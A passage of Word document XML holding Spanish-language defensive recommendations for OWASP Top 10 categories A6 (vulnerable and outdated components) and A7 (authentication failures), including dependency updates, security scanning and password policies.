        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pruebas regulares de seguridad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF09981" w14:textId="79CA2299" w:rsidR="002059C6" w:rsidRDefault="002059C6" w:rsidP="002059C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Realizar escaneos automáticos y manuales para detectar </w:t>
      </w:r>
      <w:r w:rsidR="004045C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>configuraciones inseguras utilizando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> herramientas existentes como OWASP ZAP o </w:t>
      </w:r>
      <w:r w:rsidR="004045C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64069D19" w14:textId="090A7AC4" w:rsidR="007930F0" w:rsidRDefault="007930F0" w:rsidP="007930F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1594DFCC" w14:textId="5E2EBD08" w:rsidR="00667A64" w:rsidRPr="00EA1B01" w:rsidRDefault="00EA1B01" w:rsidP="00667A64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1B01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A6 Vuln &amp; outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5A4E49" w14:textId="77777777" w:rsidR="00667A64" w:rsidRDefault="00667A64" w:rsidP="00667A64">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC27ABA" w14:textId="77777777" w:rsidR="00103C01" w:rsidRDefault="00667A64" w:rsidP="00667A64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se sugiere inicialmente validar la siguiente página para mitigar un poco más los riesgos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2279EA56" w14:textId="40924C10" w:rsidR="00667A64" w:rsidRDefault="00F36949" w:rsidP="00103C01">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="00103C01" w:rsidRPr="00103C01">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A1FB857" w14:textId="77777777" w:rsidR="00667A64" w:rsidRDefault="00667A64" w:rsidP="00667A64">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DEFA5F0" w14:textId="77777777" w:rsidR="00667A64" w:rsidRDefault="00667A64" w:rsidP="00667A64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por otra parte, para prevenir esta vulnerabilidad en aplicaciones reales, se recomienda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBDDB34" w14:textId="77777777" w:rsidR="00667A64" w:rsidRPr="007930F0" w:rsidRDefault="00667A64" w:rsidP="00667A64">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="178F2CD7" w14:textId="286A3A59" w:rsidR="00667A64" w:rsidRPr="00837E64" w:rsidRDefault="00617AD3" w:rsidP="00667A64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00837E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Actualizaciones regulares</w:t>
      </w:r>
      <w:r w:rsidR="00667A64" w:rsidRPr="00837E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB7EA80" w14:textId="4E57AA7D" w:rsidR="00667A64" w:rsidRPr="00617AD3" w:rsidRDefault="00617AD3" w:rsidP="00667A64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Asegurarse de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> mantener actualizadas las bibliotecas y dependencias utilizadas por la aplicación además de configurar alertas para la actualización de seguridad y parches en tiempo real.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAC2BC2" w14:textId="77777777" w:rsidR="00667A64" w:rsidRDefault="00667A64" w:rsidP="00667A64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64178399" w14:textId="55E35628" w:rsidR="00667A64" w:rsidRDefault="00E06100" w:rsidP="00667A64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prueba de seguridad</w:t>
      </w:r>
      <w:r w:rsidR="00667A64" w:rsidRPr="007F02BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629DC65F" w14:textId="77777777" w:rsidR="00E06100" w:rsidRDefault="00E06100" w:rsidP="00667A64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Integrar análisis estático y dinámico en el ciclo de desarrollo para identificar componentes vulnerables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764621BB" w14:textId="33E13AE9" w:rsidR="00667A64" w:rsidRDefault="00E06100" w:rsidP="00667A64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34328257" w14:textId="454C7D6C" w:rsidR="00A4681A" w:rsidRPr="00A4681A" w:rsidRDefault="00E06100" w:rsidP="00667A64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Eliminar componentes no utilizados</w:t>
      </w:r>
      <w:r w:rsidR="00667A64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72147336" w14:textId="56954628" w:rsidR="00667A64" w:rsidRPr="00A4681A" w:rsidRDefault="005E77D1" w:rsidP="00A4681A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Realizar limpiezas periódicas para eliminar bibliotecas y componentes que ya no son necesarios.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF1CA7A" w14:textId="5329CE66" w:rsidR="00E551EE" w:rsidRDefault="00E551EE" w:rsidP="00E551EE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DFFFDE" w14:textId="24A710C5" w:rsidR="007C672B" w:rsidRDefault="007C672B" w:rsidP="007C672B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C672B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A7 Identity &amp; Auth Failure – Secure Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383B18A1" w14:textId="1882FA73" w:rsidR="00837E64" w:rsidRDefault="00837E64" w:rsidP="00837E64">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B633457" w14:textId="77777777" w:rsidR="00A066EA" w:rsidRDefault="00837E64" w:rsidP="00837E64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se sugiere inicialmente validar la siguiente página para mitigar un poco más los riesgos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DAB758" w14:textId="647B1F9D" w:rsidR="00837E64" w:rsidRDefault="00F36949" w:rsidP="00A066EA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="00A066EA" w:rsidRPr="00A066EA">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06F9C1D8" w14:textId="77777777" w:rsidR="00837E64" w:rsidRDefault="00837E64" w:rsidP="00837E64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A560D57" w14:textId="77777777" w:rsidR="00992664" w:rsidRDefault="00992664" w:rsidP="00992664">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por otra parte, para prevenir esta vulnerabilidad en aplicaciones reales, se recomienda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC96A83" w14:textId="4EAD85D7" w:rsidR="00992664" w:rsidRPr="00837E64" w:rsidRDefault="00992664" w:rsidP="00992664">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para mitigar estas vulnerabilidades, es crucial implementar políticas de seguridad para contraseñas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E4FA87" w14:textId="77777777" w:rsidR="00992664" w:rsidRPr="007930F0" w:rsidRDefault="00992664" w:rsidP="00992664">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596BE2E9" w14:textId="5DFB42D5" w:rsidR="00992664" w:rsidRPr="00837E64" w:rsidRDefault="00992664" w:rsidP="00992664">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Requisito de contraseñas fuertes</w:t>
      </w:r>
      <w:r w:rsidRPr="00837E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AECE4A1" w14:textId="0A55408A" w:rsidR="00992664" w:rsidRPr="00617AD3" w:rsidRDefault="00992664" w:rsidP="00992664">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Mínimo 12 caracteres, combinación de letras mayúsculas y minúsculas, números y símbolos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0BC21E" w14:textId="77777777" w:rsidR="00992664" w:rsidRDefault="00992664" w:rsidP="00992664">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1722B345" w14:textId="51198AA0" w:rsidR="00992664" w:rsidRDefault="00992664" w:rsidP="00992664">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Monitoreo y auditoria</w:t>
      </w:r>
      <w:r w:rsidRPr="007F02BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA7A12" w14:textId="77777777" w:rsidR="00992664" w:rsidRDefault="00992664" w:rsidP="00992664">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Detectar intentos de inicio de sesión sospechosos además enviar alertas al usuario cuando se detecten accesos desde ubicaciones desconocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363ED231" w14:textId="3AFEBF37" w:rsidR="00992664" w:rsidRDefault="00992664" w:rsidP="00992664">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23126C22" w14:textId="27CA7232" w:rsidR="00992664" w:rsidRPr="00A4681A" w:rsidRDefault="00C722D8" w:rsidP="00992664">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
